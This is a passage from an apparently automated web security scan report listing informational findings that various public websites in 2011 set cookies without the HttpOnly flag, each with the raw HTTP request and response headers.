Referer: http://fls.doubleclick.net/activityi;src=2178764;type=newkc987;cat=kcomh345;ord=1;num=2714251752477.139?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ansv4_uid=0.0; ansv4_trackers=eJxjZWdmYGBgYmECksxcXIbGBgZmJmYGhqZwtqGZGUcTUJbF0NDUnBh1Jsbm5gCm5Asp

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 02 Apr 2011 13:57:10 GMT
Server: WebStar 1.0
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://cache.adviva.net/creative/blank.gif
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-GB
Content-Length: 192
Set-Cookie: ug=a1GYlFHurBKxyC; Domain=.eu.specificmedia.com; Expires=Thu, 31-Mar-2016 13:57:10 GMT; Path=/
Connection: close

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://cache.adviva.net/creative/blank.gif">here</a>.<p>
</body>
</html>

14.46. http://translate.google.com/translate_a/element.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /translate_a/element.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /translate_a/element.js?cb=cr.googleTranslate.onTranslateElementLoad HTTP/1.1
Host: translate.google.com
Proxy-Connection: keep-alive
Google-Translate-Element-Mode: library
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=45=MN9SWdYxMCQkHpb_d4WQmZ3kNpxn-MU9rpOlJhbEI5Fv3qxoLHavXA9mGpZlvSgRwUfbeSkks_uJwt-RCh2wY4zw_ar14vIG6SnN2YqoOVhzrCC_k--3E7er-ItNIIG8; PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301748493:GM=1:IG=3:SG=1:S=dU5RHSbYxFO9H3Ys

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:48:39 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/javascript; charset=UTF-8
Content-Language: en
Pragma: no-cache
Set-Cookie: PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301748519:GM=1:IG=3:SG=1:S=BBZNQWKju3cJJqSO; expires=Mon, 01-Apr-2013 12:48:39 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 1422

(function(){var d=window,e=document;function f(b){var a=e.getElementsByTagName("head")[0];a||(a=e.body.parentNode.appendChild(e.createElement("head")));a.appendChild(b)}function _loadJs(b){var a=e.cre
...[SNIP]...

14.47. http://www.2wire.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.2wire.net
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.2wire.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:25:05 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 20 Oct 2010 20:38:29 GMT
ETag: "1d0bd-47e-64579b40"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8
Set-Cookie: TwoWireLB=3217371914.20480.0000; path=/

...[SNIP]...

14.48. http://www.411.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.411.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.411.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Vary: Accept-Encoding
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 13:42:01 GMT
Status: 200 OK
X-Runtime: 0.02831
ETag: "28868ff376e29e9093907243f62f8121"
Connection: keep-alive
Set-Cookie: wp_endemic_provider=A; domain=.411.com; path=/; expires=Sun, 03 Apr 2011 01:42:01 GMT
Set-Cookie: wp_perm=pid%3D_LLdoF0uEeCxcgAeC-lzfg; domain=.411.com; path=/; expires=Sun, 01 Apr 2012 13:42:01 GMT
Set-Cookie: wp_qc_demo_at=gn%3D%2Cage%3D%2Cchh%3D%2Cedu%3D%2Chh%3D%2Cqn%3D; domain=.411.com; path=/; expires=Sun, 01 Apr 2012 13:42:01 GMT
Set-Cookie: _wpn_sid=7494deac6a51f7c62e310ec573d0b582; domain=.411.com; path=/
Content-Length: 16254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equi
...[SNIP]...

14.49. http://www.4shared.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.4shared.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: hostid=435176162; Expires=Tue, 30-Mar-2021 13:24:08 GMT; Path=/
ETag: W/"1150-1295252940000"
Last-Modified: Mon, 17 Jan 2011 08:29:00 GMT
Content-Length: 1150
Date: Sat, 02 Apr 2011 13:24:08 GMT

...[SNIP]...

14.50. http://www.aarp.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aarp.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aarp.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:38:11 GMT
Server: Apache
Last-Modified: Sat, 02 Apr 2011 11:07:34 GMT
Accept-Ranges: bytes
Content-Length: 1406
NodeID: ws6-md.aarp.net
Cache-Control: no-cache
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerwww-md.aarp.org=2887690432.20480.0000; path=/

...[SNIP]...

14.51. http://www.aboutus.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aboutus.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aboutus.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:42:58 GMT
Content-Type: image/x-icon
Content-Length: 1406
Last-Modified: Tue, 15 Feb 2011 01:07:35 GMT
Connection: close
X-node-id: columbia
Accept-Ranges: bytes
Set-Cookie: SERVERID=columbia; path=/

...[SNIP]...

14.52. http://www.addresses.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addresses.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.addresses.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:10 GMT
Server: Apache
Expires: Sat, 16 Apr 2011 06:34:10 GMT
Cache-Control: public
ETag: 3df0322508f321b7cd4e730f2fa1acacb8eb1d38
Content-Type: image/x-icon
Set-Cookie: BIGipServerp-directory=922927882.20480.0000;domain=addresses.com; expires=Sat, 02-Apr-2011 15:04:10 GMT; path=/
Content-Length: 2238

...[SNIP]...

14.53. http://www.adp.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adp.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.adp.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=QXZQWRSaprodadpws02CKYOQ; path=/
Content-Length: 2238
Content-Type: image/x-icon
Last-Modified: Thu, 14 Dec 2000 13:41:04 GMT
Accept-Ranges: bytes
ETag: "018d080d365c01:d1a9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:45:42 GMT

...[SNIP]...

14.54. http://www.advanceautoparts.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.advanceautoparts.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.advanceautoparts.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 16 Aug 2010 19:49:41 GMT
ETag: "536ae-47e-48df622227f40"-gzip
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC"
Content-Type: image/x-icon
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 14:53:19 GMT
Date: Sat, 02 Apr 2011 13:53:19 GMT
Content-Length: 1150
Connection: close
Set-Cookie: Region=DC; path=/; domain=.advanceautoparts.com
Set-Cookie: City=WASHINGTON; path=/; domain=.advanceautoparts.com
Set-Cookie: Areacode=202+703+301; path=/; domain=.advanceautoparts.com
Set-Cookie: Zip=20001-20020+20024+20026+20029-20082+20088-20091+20097-20099+20201-20245+20250-20251+20254+20260-20262+20265-20270+20277+20289+20299+20301+20303+20306-20307+20310+20314-20319+20330+20332+20336-20340+20350+20370+20372-20376+20380+20388-20395+20398+20401-20429+20431+20433-20444+20447+20451+20453+20456+20460+20463+20468-20472+20500-20510+20515+20520-20527+20530-20560+20565-20566+20570-20581+20585-20586+20590-20599; path=/; domain=.advanceautoparts.com

...[SNIP]...

14.55. http://www.alibaba.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alibaba.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.alibaba.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:24 GMT
Server: Apache/2.2.15 (Unix) mod_AliCookie(for apache2.x)/1.1 Beacon/3.2 mod_jk/1.2.28
Set-Cookie: ali_apache_id=173.193.214.243.64460051084706.7; path=/; domain=.alibaba.com; expires=Wed, 30-Nov-2084 01:01:01 GMT
Set-Cookie: ali_apache_sid=173.193.214.243.64460051084706.7|1301752884; path=/; domain=.alibaba.com
Last-Modified: Wed, 29 Dec 2010 15:54:08 GMT
ETag: "dc008-57e-4988e9451a800"
Accept-Ranges: bytes
Content-Length: 1406
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain

...[SNIP]...

14.56. http://www.americanexpress.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.americanexpress.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.americanexpress.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:34 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1301751214570006; path=/; expires=Tue, 05-Apr-16 13:33:34 GMT; domain=.americanexpress.com
Last-Modified: Wed, 21 Oct 2009 07:07:44 GMT
Accept-Ranges: bytes
Content-Length: 894
Cache-Control: max-age=1
Expires: Sat, 02 Apr 2011 13:33:35 GMT
Content-Type: image/x-icon

...[SNIP]...

14.57. http://www.americantowns.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.americantowns.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.americantowns.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=ZONVIRS192.168.6.52CKMQY; path=/
Date: Sat, 02 Apr 2011 13:39:53 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 17 Dec 2010 19:33:56 GMT
ETag: "550604-436-497a0404a1100"
Accept-Ranges: bytes
Content-Length: 1078
Content-Type: text/plain; charset=UTF-8

...[SNIP]...

14.58. http://www.apartmentratings.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apartmentratings.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.apartmentratings.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:40 GMT
Server: Apache
Last-Modified: Wed, 18 Aug 2010 21:44:46 GMT
ETag: "1cf3b8-57e-48e1ff9632f80"
Accept-Ranges: bytes
Content-Length: 1406
Cache-Control: max-age=600
Expires: Sat, 02 Apr 2011 14:03:40 GMT
Vary: Accept-Encoding
X-Cnection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerapt-www_POOL=1189351596.0.0000; path=/

...[SNIP]...

14.59. http://www.apartments.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apartments.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.apartments.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 318
Content-Type: image/x-icon
Last-Modified: Thu, 10 Mar 2005 19:16:51 GMT
Accept-Ranges: bytes
ETag: "eef59cb6a525c51:0"
Server: Microsoft-IIS/7.5
Set-Cookie: userSite=Active|True@TotalNumberOfUsers|100@NumberOfBetaUsers|0@UserSiteType|Apt@BaseURL|www@SiteId|1@BetaNumber|169@RedirectURL|http://www.apartments.com@; domain=.apartments.com; expires=Sat, 02-Mar-2013 14:45:17 GMT; path=/
Set-Cookie: activitylogging=expirationday=3/31/2016 8:45:17 AM&lastactivitytime=4/2/2011 8:45:17 AM&visitid=22aa4494-a1e4-4ad2-a264-1d3adfed4348&visitorid=d943f403-d2ad-491a-ad99-f9674d3c3681&lastfrontdoor=APTS; expires=Thu, 31-Mar-2016 13:45:17 GMT; path=/
Set-Cookie: AptAff=e2277821e6304b3afb4cea5f8f0c0654980fee5bfc0e3c990502f3aacef349fa;Path=/
Set-Cookie: userSite=Active|True@TotalNumberOfUsers|100@NumberOfBetaUsers|0@UserSiteType|Apt@BaseURL|www@SiteId|1@BetaNumber|169@RedirectURL|http://www.apartments.com@; domain=.apartments.com; expires=Sat, 02-Mar-2013 14:45:17 GMT; path=/
Set-Cookie: activitylogging=expirationday=3/31/2016 8:45:17 AM&lastactivitytime=4/2/2011 8:45:17 AM&visitid=22aa4494-a1e4-4ad2-a264-1d3adfed4348&visitorid=d943f403-d2ad-491a-ad99-f9674d3c3681&lastfrontdoor=APTS; expires=Thu, 31-Mar-2016 13:45:17 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:45:16 GMT
Set-Cookie: aptspersistence=578884780.24576.0000; path=/

...[SNIP]...

14.60. http://www.automotive.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.automotive.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.automotive.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=kc4mq245jn1lcx55hwsqsuze; path=/; HttpOnly
Set-Cookie: UserPuid=2324458499622796901; domain=automotive.com; expires=Sat, 02-Apr-2061 13:40:51 GMT; path=/
Cache-Control: private
Content-Type: image/x-icon
Content-Length: 426

...[SNIP]...

14.61. http://www.autotrader.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.autotrader.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:47 GMT
Server: Apache
Set-Cookie: v1st=25A5F04B12A8896B; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1301750747268522; path=/; expires=Thu, 12-Mar-15 13:25:47 GMT; domain=.autotrader.com
Last-Modified: Tue, 15 Mar 2011 18:14:33 GMT
Accept-Ranges: bytes
Content-Length: 318
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: image/vnd.microsoft.icon
Set-Cookie: BIGipServerAT-Production_hhtp=209020426.61475.0000; path=/

...[SNIP]...

14.62. http://www.autozone.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autozone.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.autozone.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:41:04 GMT
Server: Apache
Last-Modified: Wed, 04 Mar 2009 22:09:57 GMT
Accept-Ranges: bytes
Content-Length: 3262
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Set-Cookie: NSC_bvupapof.dpn=e795366b3660;Version=1;path=/

...[SNIP]...

14.63. http://www.away.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.away.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.away.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 14:07:04 GMT
Server: Apache/2.2.9 (Unix) mod_jk/1.2.15
Location: http://away.com/favicon.ico
Content-Length: 235
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_xxx.bxbz.dpn.80_dt_efgbvmu=ffffffff09e34a3745525d5f4f58455e445a4a423660;path=/
Set-Cookie: NSC_xxx.bxbz.dpn.80_gxe=ffffffff09e3082b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://away.com/favicon
...[SNIP]...

14.64. http://www.baidu.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.baidu.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.baidu.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:08 GMT
Server: Apache
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Set-Cookie: BAIDUID=732DA6B3A161553654A9C343A4882D17:FG=1; expires=Sun, 01-Apr-12 13:56:08 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
Last-Modified: Mon, 24 Jan 2011 11:52:05 GMT
ETag: "13e-49a963a8e0340"
Accept-Ranges: bytes
Content-Length: 318
Vary: Accept-Encoding,User-Agent
Connection: Keep-Alive
Content-Type: image/x-icon

...[SNIP]...

14.65. http://www.bankofamerica.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bankofamerica.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 12:42:47 GMT
Content-length: 1406
Content-type: text/plain
Last-modified: Thu, 01 Aug 2002 16:37:18 GMT
Etag: "57e-3d4963be"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=3108419243.20480.0000; path=/

...[SNIP]...

14.66. http://www.bbt.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbt.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bbt.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: bbt=52f3b26952f3b2fdbaeebafd; path=/
accept-ranges: bytes
content-length: 1150
content-type: image/x-icon
date: Sat, 02 Apr 2011 13:41:55 GMT
etag: "80d53910c968c81:176f"
last-modified: Wed, 06 Feb 2008 14:03:35 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-powered-by: ASP.NET
Set-Cookie: PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; Path=/

...[SNIP]...

14.67. http://www.bidcactus.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bidcactus.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bidcactus.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:17:39 GMT
Server: Apache
Last-Modified: Fri, 01 Apr 2011 16:25:10 GMT
ETag: "7d40c4-47e-49fddda8b6580"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: image/x-icon
Set-Cookie: BALANCEID=balancer.www13; path=/; domain=.bidcactus.com
Via: 1.1 bidcactus.com

...[SNIP]...

14.68. http://www.bizjournals.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizjournals.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bizjournals.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:39:04 GMT
Server: Apache
Set-Cookie: bizj=YToxOntzOjM6IlVJTiI7czozMDoiMjkxNTE2MTg0MzRkOTcyNmY4Y2Y3Njg3MGZlZjhjIjt9%7C1301751544%7C6cb798d646d7838561076324272978f8ff136b64cfb9b8dd5c0d4c55c0436ed1; expires=Sun, 01-Apr-2012 13:39:04 GMT; path=/; domain=.bizjournals.com
Set-Cookie: bizj=YToxOntzOjM6IlVJTiI7czozMDoiMjkxNTE2MTg0MzRkOTcyNmY4ZDBiNThjNWNlMGIzIjt9%7C1301751544%7Cb769a95f8358eec5ae178a6877548f04d46f0bba7d768b809293bbbf75c88a93; expires=Sun, 01-Apr-2012 13:39:04 GMT; path=/; domain=.bizjournals.com
ServerID: 3
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 45605

<!DOCTYPE html>
<!-- tid: 105; lct: Wed Mar 23 15:40:16 2011 -->
<!--[if IE ]><![endif]-->
<html>
<head><title>The page you requested was not found | The Business Journals</title>
<base href="http://w
...[SNIP]...

14.69. http://www.blogrolling.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blogrolling.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blogrolling.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
